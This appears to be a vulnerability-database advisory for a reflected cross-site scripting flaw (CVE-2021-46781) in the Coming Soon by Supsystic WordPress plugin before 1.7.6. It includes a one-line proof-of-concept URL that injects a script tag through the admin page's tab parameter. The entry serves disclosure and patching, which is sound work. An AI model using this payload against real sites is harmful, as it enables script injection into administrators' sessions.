WordPress Plugin Vulnerabilities

Coming Soon by Supsystic < 1.7.6 - Reflected Cross-Site Scripting

Description

The plugin does not sanitise and escape the tab parameter before outputting it back in an attribute in the admin dashboard, leading to a Reflected Cross-Site Scripting

Proof of Concept

https://example.com/wp-admin/admin.php?page=coming-soon-supsystic&tab="><script>alert(/XSS/)</script>

Affects Plugins

Plugin icon
coming-soon-by-supsystic
Fixed in 1.7.6

References

CVE
CVE-2021-46781

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
6.1 (medium)

Miscellaneous

Original Researcher
0xB9
Submitter twitter
0xB9sec
Verified
Yes
WPVDB ID
49589867-f764-4c4a-b640-84973c673b23

Timeline

Publicly Published
2021-05-24 (about 2 years ago)
Added
2022-04-04 (about 2 years ago)
Last Updated
2022-04-09 (about 2 years ago)

Other

Published
Title
Published
2024-04-03
Title
WordPress Tag and Category Manager – AI Autotagger < 3.20.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Published
2014-08-01
Title
copy-in-clipboard <= 0.8 - XSS in ZeroClipboard
Published
2022-02-16
Title
Flexi - Guest Submit < 4.20 - Reflected Cross-Site Scripting
Published
2024-04-15
Title
WP-Cufon <= 1.6.10 - Unauthenticated Stored Cross-Site Scripting
Published
2021-08-02
Title
StoryChief < 1.0.31 - Authenticated Stored Cross-Site Scripting (XSS)